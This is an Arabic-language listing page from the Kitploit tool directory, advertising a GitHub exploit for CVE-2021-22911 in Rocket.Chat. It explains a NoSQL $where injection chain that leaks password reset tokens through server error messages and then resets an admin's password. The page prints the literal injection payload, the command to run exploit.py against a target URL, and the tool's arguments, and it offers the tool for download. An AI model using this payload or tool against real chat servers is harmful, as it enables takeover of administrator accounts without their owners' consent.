Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RocketChat-NoSQLi-Chain-CVE-2021-22911 — أداة استغلال تلقائية لحقن NoSQL في Rocket.Chat تسرّب رموز إعادة تعيين كلمة المرور عبر جملة $where وتنفّذ استيلاءً على الحسابات دون مصادقة. | Kitploit
أدوات/GitHubGitHub/tenebrae93/rocketchat-nosqli-chain-cve-2021-22911
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubtenebrae93/rocketchat-nosqli-chain-cve-2021-22911

RocketChat-NoSQLi-Chain-CVE-2021-22911

أداة استغلال تلقائية لحقن NoSQL في Rocket.Chat تسرّب رموز إعادة تعيين كلمة المرور عبر جملة $where وتنفّذ استيلاءً على الحسابات دون مصادقة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

Rocket.Chat NoSQLi Token Leak & Password Reset

نص برمجي آلي لاستغلال ثغرات Rocket.Chat (والتطبيقات المبنية على Meteor)، يعتمد على حقن NoSQL عبر عبارة $where لتسريب رموز إعادة تعيين كلمة المرور من خلال استثناءات من جانب الخادم. وبمجرد تسريب الرمز، يقوم النص البرمجي بإعادة تعيين كلمة المرور دون مصادقة.

نظرة عامة على الثغرة

  1. المصادقة: يقوم النص البرمجي بالمصادقة كمستخدم عادي للوصول إلى نقطة النهاية /api/v1/users.list.

  2. حقن NoSQL: يستخدم معامل query لحقن عبارة $where بلغة JavaScript.

  3. استخراج البيانات: باستخدام العبارة throw داخل الحقن، يجبر الخادم على إرجاع خطأ «استثناء غير مُلتقَط» يحتوي على رمز إعادة تعيين كلمة مرور المستخدم المستهدف.

  4. الاستيلاء على الحساب: يستخدم النص البرمجي الرمز المُسرَّب لاستدعاء resetPassword، مما يغيّر كلمة مرور الحساب المستهدف.

الاستخدام

المتطلبات الأساسية

  • Python 3.x

  • مكتبة requests

Bash

root@kitploit:~
pip install requests

التنفيذ

Bash

root@kitploit:~
python3 exploit.py --url http://<TARGET_IP>:3000\
                   -u <YOUR_USER>\
                   -p <YOUR_PASS>\
                   -a <TARGET_ADMIN_USER>\
                   -ap <NEW_ADMIN_PASSWORD>

وسائط سطر الأوامر

تفاصيل سلسلة الاستغلال

جوهر الاستغلال هو سلسلة الحقن التالية:

JavaScript

root@kitploit:~
{"$where":"this.username==='admin' && (()=>{ throw this.services.password.reset.token })()"}

عند معالجتها من جانب الخادم، ينفّذ محرك قاعدة البيانات الدالة المجهولة، ويتعطل عند throw، ثم يلتقط التطبيق الاستثناء، ويمرر الرمز السري إلى المستخدم عن غير قصد داخل استجابة الخطأ JSON.

تنزيل الأداة
الوسيطالعلامة الطويلةالوصف
-u--userاسم المستخدم أو البريد الإلكتروني الصالح الخاص بك للمصادقة الأولية.
-p--passwordكلمة المرور الصالحة الخاصة بك.
-a--adminاسم المستخدم للحساب الذي تريد إعادة تعيين كلمة مروره.
-ap--admin-passكلمة المرور الجديدة التي سيتم تعيينها لحساب المسؤول.
--urlعنوان URL الأساسي لمثيل Rocket.Chat.